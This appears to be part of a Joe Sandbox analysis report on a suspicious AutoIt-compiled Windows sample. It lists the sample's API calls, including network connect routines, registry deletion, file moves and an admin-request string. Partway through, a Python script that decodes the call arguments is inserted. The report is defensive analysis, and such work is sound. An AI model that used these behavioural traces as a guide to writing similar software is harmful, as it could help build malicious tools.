                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00860E64
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00860EA8
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00860EC9
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      Similarity
                                                      • API ID: _wcsncpy$LocalTime
                                                      • String ID:
                                                      APIs
                                                        • Part of subcall function 0086466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00863697,?), ref: 0086468B
                                                        • Part of subcall function 0086466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00863697,?), ref: 008646A4
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 008636B7
                                                      • _wcscmp.LIBCMT ref: 008636D3
                                                      • MoveFileW.KERNEL32(?,?), ref: 008636EB
                                                      • _wcscat.LIBCMT ref: 00863733
                                                      • SHFileOperationW.SHELL32(?), ref: 0086379F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 1377345388-1173974218
                                                      • Opcode ID: 747fc82a78ad0e975a7e3851b1c58afb02f508ccf2959abd1f9110979de1b4cc
                                                      • Instruction ID: 8254fc1b036b2858d1c10606e8e916b17fd2898c5c58cf965236183cf8b41f84
                                                      • Opcode Fuzzy Hash: 747fc82a78ad0e975a7e3851b1c58afb02f508ccf2959abd1f9110979de1b4cc
                                                      • Instruction Fuzzy Hash: 99418171508344AEC752EF68D4419DFB7E8FF99340F00182EB49AC3251EA34D689C753
                                                      APIs
                                                      • _memset.LIBCMT ref: 008872AA
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00887351
                                                      • IsMenu.USER32(?), ref: 00887369
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008873B1
                                                      • DrawMenuBar.USER32 ref: 008873C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                      • String ID: 0
                                                      • API String ID: 3866635326-4108050209
                                                      • Opcode ID: 9a8bb324f42c121553a9af06bda3b3867d8c8470e44d18407c5bba2930c55376
                                                      • Instruction ID: a0920f153de7557491408005d41f72a49b95297992a4fa962e93cf89671ce91b
                                                      • Opcode Fuzzy Hash: 9a8bb324f42c121553a9af06bda3b3867d8c8470e44d18407c5bba2930c55376
                                                      • Instruction Fuzzy Hash: A5412575A04208AFDB20EF54D884EAABBB8FB08314F648429FD15E7360D730ED50EB51
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00880FD4
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00880FFE
                                                      • FreeLibrary.KERNEL32(00000000), ref: 008810B5
                                                        • Part of subcall function 00880FA5: RegCloseKey.ADVAPI32(?), ref: 0088101B
                                                        • Part of subcall function 00880FA5: FreeLibrary.KERNEL32(?), ref: 0088106D
                                                        • Part of subcall function 00880FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00881090
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00881058
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                      • String ID:
                                                      • API String ID: 395352322-0
                                                      • Opcode ID: e8402555f1f206f5abef21422522a7219235c6f162bdfc815e6e1aee8e2e31f1
                                                      • Instruction ID: 11459d939bc5473978f4f4877296b8434d72ce7869612e16e13a497a6441de96
                                                      • Opcode Fuzzy Hash: e8402555f1f206f5abef21422522a7219235c6f162bdfc815e6e1aee8e2e31f1
                                                      • Instruction Fuzzy Hash: 4E31F971901509BFDF15AB94DC89AFEB7BCFF08300F10416AF601E2151EB749E8A9BA1
                                                      APIs
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008862EC
                                                      • GetWindowLongW.USER32(00A12418,000000F0), ref: 0088631F
                                                      • GetWindowLongW.USER32(00A12418,000000F0), ref: 00886354
                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00886386
                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008863B0
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 008863C1
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008863DB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID:
                                                      • API String ID: 2178440468-0
                                                      • Opcode ID: a9e4feadb5fb12a74be1a2e2fd7627da80415fe073179479a7fbcdea393b4b7d
                                                      • Instruction ID: 4e0066dbe208f7ccf0f29715fee1c363c70668a7af62be461a280833a72a044b
                                                      • Opcode Fuzzy Hash: a9e4feadb5fb12a74be1a2e2fd7627da80415fe073179479a7fbcdea393b4b7d
                                                      • Instruction Fuzzy Hash: CF31F230644251AFDB21DF18EC85F5537E1FB5A714F1902A8F601DF2B2EB71A890DB51
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0085DB2E
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0085DB54
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0085DB57
                                                      • SysAllocString.OLEAUT32(?), ref: 0085DB75
                                                      • SysFreeString.OLEAUT32(?), ref: 0085DB7E
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0085DBA3
                                                      • SysAllocString.OLEAUT32(?), ref: 0085DBB1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: f52b14d7e2d6063e2aa6c852b32e8210c533b0b93d57445c916015dd2a8485b6
                                                      • Instruction ID: 68bfb23319b0da0b466a8b88ccdb0925b5c5a193ea4f36756111e0b00358af9c
                                                      • Opcode Fuzzy Hash: f52b14d7e2d6063e2aa6c852b32e8210c533b0b93d57445c916015dd2a8485b6
                                                      • Instruction Fuzzy Hash: 3B218176600219AFEF20DFA8DC88CBB73ADFB09371B118526FE14DB251D6709C458765
                                                      APIs
                                                        • Part of subcall function 00877D8B: inet_addr.WS2_32(00000000), ref: 00877DB6
                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 008761C6
                                                      • WSAGetLastError.WS2_32(00000000), ref: 008761D5
                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 0087620E
                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00876217
                                                      • WSAGetLastError.WS2_32 ref: 00876221
                                                      • closesocket.WS2_32(00000000), ref: 0087624A
                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00876263
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 910771015-0
                                                      • Opcode ID: 6a9ac664916615de0ebc7265e148eabb40c7d3597edcccf9cac1aa24eaa8fea0
                                                      • Instruction ID: b728a0628da3978cd5133b5b8f81d6e97ac34da8a8d8265cf183412622125735
                                                      • Opcode Fuzzy Hash: 6a9ac664916615de0ebc7265e148eabb40c7d3597edcccf9cac1aa24eaa8fea0
                                                      • Instruction Fuzzy Hash: E031A471600518ABEF10AF28CC85BBD7BA9FF45725F048069FD09E7296DB70EC149B62
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                      • API String ID: 1038674560-2734436370
                                                      • Opcode ID: 698581fb9c8c681c1f4b9fbbbb70ac8461bf30a07536e95f75dea5f626305e57
                                                      • Instruction ID: a31fc20360f5e9f8752b457b1079e87144b7f979c9a03dc33958dfa8659ae400
                                                      • Opcode Fuzzy Hash: 698581fb9c8c681c1f4b9fbbbb70ac8461bf30a07536e95f75dea5f626305e57
                                                      • Instruction Fuzzy Hash: E82149722041617AD620B638AC02EA773DCFF69355F144439FE45C7193FB549D89C396
                                                      APIs
                                                        • Part of subcall function 00801D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00801D73
                                                        • Part of subcall function 00801D35: GetStockObject.GDI32(00000011), ref: 00801D87
                                                        • Part of subcall function 00801D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00801D91
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00887632
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0088763F
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0088764A
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00887659
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00887665
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: 7e2b15c0cd52bc163cd587818b3346769ea4a35743639d8a2e1e9a93198deae2
                                                      • Instruction ID: c7d02d9d76ff4576afe97d17bbdb552f929edbd693254a6cb6576027ce211b8f
                                                      • Opcode Fuzzy Hash: 7e2b15c0cd52bc163cd587818b3346769ea4a35743639d8a2e1e9a93198deae2
                                                      • Instruction Fuzzy Hash: AC1193B1110119BFEF159F64CC85EE77F6DFF087A8F114215BA04A21A0D6729C21DBA4
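The SendMessageW, socket and ioctlsocket calls in the entries above are printed with raw hexadecimal arguments, which hides what the functions do: the 0xF0/0xF1 messages are BM_GETCHECK/BM_SETCHECK (a checkbox toggle), the 0x401..0x2001 messages on the Msctls_Progress32 control are the PBM_* progress-bar messages, and 8004667E is FIONBIO, the two-sided toggle around connect that implements a non-blocking TCP connect with timeout. The Python decoder below is an added example, not part of the Joe Sandbox report; the constant values come from the Windows SDK headers (winuser.h, commctrl.h, winsock2.h), the `iow` helper reproduces the Winsock `_IOW` macro to confirm the FIONBIO value, and the line parser and the `SAMPLE_LINES` list (copied from the entries on this page) are this example's own assumptions about the report's text format.

```python
"""Decode the raw hexadecimal arguments that Joe Sandbox prints in its
per-function API listings, e.g.
    SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00887659
into Windows SDK constant names. Added example, not part of the report;
constant values are from winuser.h, commctrl.h and winsock2.h."""
import re

# Window messages seen in the SendMessageW calls on this page (winuser.h / commctrl.h).
WINDOW_MESSAGES = {
    0x0030: "WM_SETFONT",
    0x00F0: "BM_GETCHECK",
    0x00F1: "BM_SETCHECK",
    0x0401: "PBM_SETRANGE",
    0x0402: "PBM_SETPOS",
    0x0404: "PBM_SETSTEP",
    0x0409: "PBM_SETBARCOLOR",
    0x2001: "PBM_SETBKCOLOR",  # same value as CCM_SETBKCOLOR
}

# socket(af, type, protocol) argument names (winsock2.h).
ADDRESS_FAMILIES = {2: "AF_INET", 23: "AF_INET6"}
SOCKET_TYPES = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTOCOLS = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}

IOC_IN = 0x80000000
IOCPARM_MASK = 0x7F


def iow(group: str, num: int, size: int) -> int:
    """Winsock _IOW(x, y, t): IOC_IN | ((sizeof(t) & IOCPARM_MASK) << 16) | (x << 8) | y."""
    return IOC_IN | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | num


# FIONBIO is _IOW('f', 126, u_long); with a 4-byte u_long this is 0x8004667E.
IOCTL_CODES = {iow("f", 126, 4): "FIONBIO"}

# Assumed report line shape: 'Api.MODULE(arg,arg,...), ref: ADDR', possibly
# prefixed by 'Part of subcall function ADDR:'.
_CALL_RE = re.compile(r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\)")


def parse_call(line):
    """Split one report line into (api, module, args).

    Hex arguments become ints, '?' (unknown to the sandbox) becomes None and
    symbolic arguments such as FlsAlloc stay as strings. Returns None for
    entries without an argument list (e.g. '_memset.LIBCMT ref: ...')."""
    m = _CALL_RE.search(line)
    if not m:
        return None
    args = []
    for raw in m.group("args").split(","):
        raw = raw.strip()
        if raw in ("", "?"):
            args.append(None)
            continue
        try:
            args.append(int(raw, 16))
        except ValueError:
            args.append(raw)
    return m.group("api"), m.group("module"), args


def annotate(line):
    """Return 'Api.MODULE: <decoded constants>' for one report line."""
    parsed = parse_call(line)
    if parsed is None:
        return line.strip()
    api, module, args = parsed
    notes = []
    if api == "SendMessageW" and len(args) >= 2 and isinstance(args[1], int):
        msg = WINDOW_MESSAGES.get(args[1], f"0x{args[1]:04X}")
        notes.append(msg)
        if msg == "PBM_SETRANGE" and len(args) >= 4 and isinstance(args[3], int):
            # lParam is MAKELPARAM(min, max): LOWORD = min, HIWORD = max.
            notes.append(f"range {args[3] & 0xFFFF}..{(args[3] >> 16) & 0xFFFF}")
        elif msg == "BM_SETCHECK" and len(args) >= 3 and isinstance(args[2], int):
            notes.append("BST_CHECKED" if args[2] == 1 else "BST_UNCHECKED")
    elif api == "ioctlsocket" and len(args) >= 2 and isinstance(args[1], int):
        notes.append(IOCTL_CODES.get(args[1], f"0x{args[1]:08X}"))
    elif api == "socket" and len(args) >= 3:
        notes.append("/".join((ADDRESS_FAMILIES.get(args[0], str(args[0])),
                               SOCKET_TYPES.get(args[1], str(args[1])),
                               PROTOCOLS.get(args[2], str(args[2])))))
    head = f"{api}.{module}"
    return f"{head}: {', '.join(notes)}" if notes else head


# Constructed input: lines copied from the entries on this page.
SAMPLE_LINES = [
    "• socket.WS2_32(00000002,00000001,00000006), ref: 008761C6",
    "• ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 0087620E",
    "• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008863B0",
    "• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00887659",
    "• Part of subcall function 00801D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00801D91",
]


def decode_all(lines=SAMPLE_LINES):
    """Annotate every line; unparseable lines are passed through unchanged."""
    return [annotate(line) for line in lines]


if __name__ == "__main__":
    for out in decode_all():
        print(out)
```

Run on the sample lines it prints one decoded call per line (for instance `SendMessageW.USER32: PBM_SETRANGE, range 0..100`). The argument values the sandbox prints are reconstructed from the stack at the time of the call, so a value shown as `?` or an implausible constant (such as the 0xF0 passed to GetWindowLongW above) should be read as unknown rather than decoded.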
                                                      APIs
                                                      • __init_pointers.LIBCMT ref: 00829AE6
                                                        • Part of subcall function 00823187: RtlEncodePointer.NTDLL(00000000), ref: 0082318A
                                                        • Part of subcall function 00823187: __initp_misc_winsig.LIBCMT ref: 008231A5
                                                        • Part of subcall function 00823187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00829EA0
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00829EB4
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00829EC7
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00829EDA
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00829EED
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00829F00
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00829F13
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00829F26
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00829F39
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00829F4C
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00829F5F
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00829F72
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00829F85
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00829F98
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00829FAB
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00829FBE
                                                      • __mtinitlocks.LIBCMT ref: 00829AEB
                                                      • __mtterm.LIBCMT ref: 00829AF4
                                                        • Part of subcall function 00829B5C: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00829C56
                                                        • Part of subcall function 00829B5C: _free.LIBCMT ref: 00829C5D
                                                        • Part of subcall function 00829B5C: RtlDeleteCriticalSection.NTDLL(008BEC00), ref: 00829C7F
                                                      • __calloc_crt.LIBCMT ref: 00829B19
                                                      • __initptd.LIBCMT ref: 00829B3B
                                                      • GetCurrentThreadId.KERNEL32(00827CD0,008BA0B8,00000014), ref: 00829B42
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                      • String ID:
                                                      • API String ID: 3567560977-0
                                                      • Opcode ID: 8d7f408dedb5bcab9a94e047b8701e3a9e4d634ad9bcb034e8c235d24a97f083
                                                      • Instruction ID: da28ae99770fb7b27e6d45832ab80ed556cb0b42b42533803e13935d2222ea2d
                                                      • Opcode Fuzzy Hash: 8d7f408dedb5bcab9a94e047b8701e3a9e4d634ad9bcb034e8c235d24a97f083
                                                      • Instruction Fuzzy Hash: 12F090325197315EE634777CBC0768A3B90FF02730F200A29F4E5D51D2EF2184C145A6
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00823F85), ref: 00824085
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0082408C
                                                      • RtlEncodePointer.NTDLL(00000000), ref: 00824097
                                                      • RtlDecodePointer.NTDLL(00823F85), ref: 008240B2
                                                      Strings
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoUninitialize$combase.dll
                                                      • API String ID: 3489934621-2819208100
                                                      • Opcode ID: 2da0cca4a536b67bfcf7bb78f418d7dd44ae38fd5f8017e6d7698d6cd9263bd8
                                                      • Instruction ID: afa1cfba3adc661ba952514908b3b6e73d5a96f64be03f26da845918f7b633ac
                                                      • Opcode Fuzzy Hash: 2da0cca4a536b67bfcf7bb78f418d7dd44ae38fd5f8017e6d7698d6cd9263bd8
                                                      • Instruction Fuzzy Hash: B9E0B670581310EFEB50AF66ED0DF453AB5F704742F18802AF211E12A1CBBA4645DB14
                                                      APIs
                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 00876C00
                                                      • WSAGetLastError.WS2_32(00000000), ref: 00876C34
                                                      • htons.WS2_32(?), ref: 00876CEA
                                                      • inet_ntoa.WS2_32(?), ref: 00876CA7
                                                        • Part of subcall function 0085A7E9: _strlen.LIBCMT ref: 0085A7F3
                                                        • Part of subcall function 0085A7E9: _memmove.LIBCMT ref: 0085A815
